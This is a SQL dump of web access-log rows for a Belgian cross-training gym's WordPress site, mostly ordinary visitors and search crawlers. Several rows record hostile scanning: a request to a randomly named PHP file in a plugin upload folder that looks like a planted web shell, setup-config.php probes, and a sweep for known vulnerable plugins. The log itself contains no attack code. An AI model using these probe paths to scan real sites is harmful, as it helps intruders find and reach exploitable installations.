(77300, 1500012313.886649, 3373404845, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/zTisCnHaSLBeVo.php', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(77301, 1500014006.592653, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77302, 1500014007.077430, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77303, 1500014057.109551, 2342668003, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/js/tinymce/plugins/wpview/diff.php', 'http://crosstrainingcenter.be/wp-includes/js/tinymce/plugins/wpview/diff.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(77304, 1500015433.866794, 3652607482, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Go-http-client/1.1'),
(77305, 1500015434.634345, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Go-http-client/1.1'),
(77306, 1500015442.031327, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Go-http-client/1.1'),
(77307, 1500015443.587882, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/le-cross-training', 'Go-http-client/1.1'),
(77308, 1500015445.287247, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/notre-philosophie', 'Go-http-client/1.1'),
(77309, 1500015455.497255, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/les-seances-namur', 'Go-http-client/1.1'),
(77310, 1500015457.459933, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/en-images', 'Go-http-client/1.1'),
(77311, 1500015467.453949, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/lequipe', 'Go-http-client/1.1'),
(77312, 1500015476.272705, 3652607482, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/contact', 'Go-http-client/1.1'),
(77313, 1500015490.584914, 3652607482, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/nouvelles-seances-ct.png', '', 'Go-http-client/1.1'),
(77314, 1500018248.132143, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77315, 1500024452.190106, 584016457, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(77316, 1500024452.752034, 584016457, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'ia_archiver'),
(77317, 1500034549.736955, 2760155812, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(77318, 1500040643.029320, 3649630461, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77319, 1500040646.538434, 3649630461, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77320, 1500040650.872689, 3649630461, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77321, 1500040679.794055, 3649630461, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77322, 1500040684.156559, 3649630461, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77323, 1500040708.226782, 3649630461, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77324, 1500040710.260129, 3649630461, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(77325, 1500042055.968032, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77326, 1500045095.780095, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77327, 1500045546.254241, 2194900209, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://google.com', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(77328, 1500045583.164444, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77329, 1500045583.682199, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77330, 1500045584.210885, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77331, 1500045585.041282, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77332, 1500045585.802466, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77333, 1500045586.224664, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77334, 1500045586.663857, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77335, 1500045587.173307, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77336, 1500045587.729154, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77337, 1500045588.203774, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77338, 1500045588.701367, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77339, 1500045589.241483, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77340, 1500045589.834515, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77341, 1500045590.369036, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77342, 1500049517.975305, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77343, 1500049518.488205, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77344, 1500049518.963845, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77345, 1500049519.416237, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77346, 1500049519.938869, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77347, 1500049520.392738, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77348, 1500049520.874178, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77349, 1500049521.388066, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77350, 1500049522.109489, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77351, 1500049522.920966, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77352, 1500049523.345841, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77353, 1500049523.970105, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77354, 1500049524.413101, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77355, 1500049524.909758, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77356, 1500053125.158808, 3475901893, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77357, 1500060672.112520, 1375113052, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(77358, 1500060672.891931, 1375113052, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77359, 1500060673.689441, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77360, 1500060674.186519, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77361, 1500060674.631990, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77362, 1500060675.139128, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77363, 1500060675.757440, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77364, 1500060676.634358, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77365, 1500060677.130056, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77366, 1500060677.671969, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77367, 1500060678.204063, 1375113052, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(77368, 1500069010.717763, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(77369, 1500069011.401060, 1399309361, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;)'),
(77370, 1500071567.321368, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(77371, 1500071567.829364, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77372, 1500071568.260186, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77373, 1500071568.772284, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77374, 1500071569.349184, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77375, 1500071569.822702, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77376, 1500071570.455258, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77377, 1500071570.953093, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77378, 1500071571.400232, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77379, 1500071571.826495, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77380, 1500071572.278311, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77381, 1500071573.090398, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77382, 1500071573.573649, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77383, 1500071574.071510, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(77384, 1500086851.056888, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/main/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(77385, 1500086851.070378, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/press/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(77386, 1500086851.652877, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/protal/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(77387, 1500086851.659630, 3233512354, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/cms/wp-admin/setup-config.php', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(77388, 1500092123.609985, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77389, 1500095222.794879, 2538613875, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77390, 1500095224.876260, 2538613875, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-limelette/feed/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(77391, 1500099285.201728, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(77392, 1500099285.938931, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77393, 1500099286.427497, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77394, 1500099286.927792, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77395, 1500099288.172829, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77396, 1500099289.287629, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77397, 1500099289.774664, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77398, 1500099290.202681, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(77399, 1500099290.591127, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77400, 1500099291.313248, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77401, 1500099291.761477, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77402, 1500099293.213001, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77403, 1500099293.638225, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77404, 1500099294.065145, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(77405, 1500109898.108907, 2996488251, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(77406, 1500109898.209340, 1476059143, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(77407, 1500109902.159214, 2996488242, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(77408, 1500117938.963453, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77409, 1500117939.396343, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77410, 1500118492.827895, 2637637469, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77411, 1500119132.386450, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77412, 1500126788.459036, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77413, 1500132366.898366, 1742919172, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18'),
(77414, 1500132368.438856, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/another-wordpress-classifieds-plugin/AWPCP.po', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1'),
(77415, 1500132370.974730, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-image-news-slider/functions.php', '', 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24'),
(77416, 1500132372.310496, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-filemanager/fm.php', '', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14'),
(77417, 1500132372.960880, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-homepage-slideshow/functions.php', '', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1'),
(77418, 1500132372.961321, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wpstorecart/lgpl.txt', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16'),
(77419, 1500132373.233032, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-e-commerce/license.txt', '', 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30'),
(77420, 1500132373.326546, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/zingiri-web-shop/admin.css', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24'),
(77421, 1500132374.501969, 1742919172, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/magic-fields/MF_Constant.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30'),
(77422, 1500132374.510800, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/ninja-forms/ninja_forms.php', '', 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16'),
(77423, 1500132375.230921, 1742919169, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/auto-attachments/a-a.css', '', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.8 (KHTML, like Gecko) Chrome/16.0.912.63 Safari/535.8'),
